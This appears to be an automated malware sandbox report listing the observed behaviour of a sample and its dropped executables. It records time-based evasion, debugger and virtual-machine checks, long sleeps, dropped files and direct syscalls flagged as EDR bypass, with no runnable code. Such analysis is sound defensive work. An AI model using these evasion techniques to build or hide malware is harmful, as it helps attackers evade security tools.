Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,	3_2_00007FF72A93C0B0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: GetAdaptersInfo,_strlwr,strstr,free,	4_2_00007FF7F414BFF0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,_strlwr,strstr,free,GetComputerNameA,getenv,GetDiskFreeSpaceA,	4_2_00007FF7F414C0B0

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xsnxlhd	Jump to dropped file
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Dropped PE file which has not been started: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Helicoid.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dykhaneiil	Jump to dropped file

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Evaded block: after key decision
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Evaded block: after key decision

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe TID: 7832	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 3340	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 4432	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe TID: 4424	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 004FFF61h	0_2_004FFEC6
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 004FFF5Ah	0_2_004FFEC6
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00D8FF61h	2_2_00D8FEC6
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D8FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00D8FF5Ah	2_2_00D8FEC6

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	0_2_004C3CC4
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_00504440 FindFirstFileW,FindClose,	0_2_00504440
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	0_2_004D9B43
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F7B87 FindFirstFileExW,	0_2_004F7B87
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D94440 FindFirstFileW,FindClose,	2_2_00D94440
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D87B87 FindFirstFileExW,	2_2_00D87B87
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D69B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	2_2_00D69B43
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D53CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,	2_2_00D53CC4
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_70002863 FindFirstFileExW,	2_2_70002863
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF5C50 #8,FindFirstFileW,FindClose,	2_2_6FFF5C50
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA2EA370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,	3_2_00007FFBAA2EA370
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815A370 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,	4_2_00007FFBA815A370

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_005097A5 VirtualQuery,GetSystemInfo,

0_2_005097A5

Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: UploadAlt_Ti.exe, 00000009.00000003.1988875965.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1974088619.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1843864307.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1973080390.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2005933569.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1955444803.0000000000542000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: ActiveISO.exe, 00000003.00000002.1466481834.00007FFBAAAB0000.00000008.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000003.00000003.1451945876.000001918E9AB000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1533381199.00007FFBA8F10000.00000008.00000001.01000000.00000016.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004EE88A

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F48D8 mov eax, dword ptr fs:[00000030h]	0_2_004F48D8
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D848D8 mov eax, dword ptr fs:[00000030h]	2_2_00D848D8
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_7000255C mov eax, dword ptr fs:[00000030h]	2_2_7000255C
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFFD099 mov eax, dword ptr fs:[00000030h]	2_2_6FFFD099

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004C394F GetProcessHeap,RtlAllocateHeap,

0_2_004C394F

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_004EE3D8
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004EE88A
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004EE9DC SetUnhandledExceptionFilter,	0_2_004EE9DC
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004F3C76
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00D7E3D8
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D7E88A
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D7E9DC SetUnhandledExceptionFilter,	2_2_00D7E9DC
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D83C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00D83C76
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF6E82 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6FFF6E82
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFFA22E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6FFFA22E
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_6FFF68AE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6FFF68AE
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A95B038 SetUnhandledExceptionFilter,	3_2_00007FF72A95B038
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A95AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF72A95AE50
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FF72A95A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF72A95A6C0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA333714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FFBAA333714
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F416A6C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FF7F416A6C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F416AE50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FF7F416AE50
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F416B038 SetUnhandledExceptionFilter,	4_2_00007FF7F416B038
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81A3714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFBA81A3714

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x6B034FDCA0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A04CD35C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBA9569635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF6A0667B9B
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x1B252AAE390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtClose: Direct from: 0x2259AD57F50
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x110	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationProcess: Direct from: 0x7FF6A04D592C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A0609056	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateFile: Direct from: 0x1B25468ED58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740C84940	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A0666934	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF740E053D4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FFBCB7626A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A0610D34	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF6A0572FE9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740CA2868	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x27544DEEDC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A056827F	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0xA0A76ACB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A04D0D62	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A0575D6F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A056EF06	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtClose: Direct from: 0x2
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x3	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x27500000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBA9658E14	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateFile: Direct from: 0x2259C77DD58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A066D6E9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A0609F80	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF6A06653D4	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x1B200000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFBAB6694F5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A053BBAD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadFile: Direct from: 0x7FF6A04DE3AD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A04D514D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFBA96594F5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtClose: Direct from: 0x1B252AFBD30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x7FFBA95694F5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740D0F15C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x7FFB40CB21D3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A04D5271	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A04C545F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A066F6D6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF6A0667B87
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBAB669635	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740CD6F7C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtRequestWaitReplyPort: Direct from: 0x7FF6A056F15C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryValueKey: Direct from: 0x7FF6A04CCF09	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBA9568E14	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x275433A9400	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740C6545F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF6A0667BA9
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A0424BD1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740C708EB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBA9659635	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x2259AD0B510	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740E06506	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A053A6BD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationProcess: Direct from: 0x7FF6A04D57C3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBCB784B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateThreadEx: Direct from: 0x7FF6A0424F42	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtEnumerateValueKey: Direct from: 0x7FF6A05B1EA9	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x2259C77FDC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtSetInformationProcess: Direct from: 0x7FF6A04E55B5	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtClose: Direct from: 0x275433F8230
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtClose: Direct from: 0x7FF6A04E4940
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF740E02667	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A060B2B6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A0666506	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenKeyEx: Direct from: 0x7FF6A04CCCE4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF6A0662667	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtSetInformationProcess: Direct from: 0x7FF6A04E3F10	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtQuerySystemInformation: Direct from: 0x22500000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtOpenFile: Direct from: 0x7FF740CDA6BD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A04D08EB	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateFile: Direct from: 0x27544DECD58	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A0429558	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBAB668E14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A066F5FE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF740C7E060	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQuerySystemInformation: Direct from: 0x7FF6A056F22E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtReadVirtualMemory: Direct from: 0x7FF6A066223C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A060AA12	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF6A0536F7C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtProtectVirtualMemory: Direct from: 0x7FF6A04E254A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A04DE347	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtCreateFile: Direct from: 0x7FF6A04DE060	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtDeviceIoControlFile: Direct from: 0x7FF6A053C735	Jump to behavior
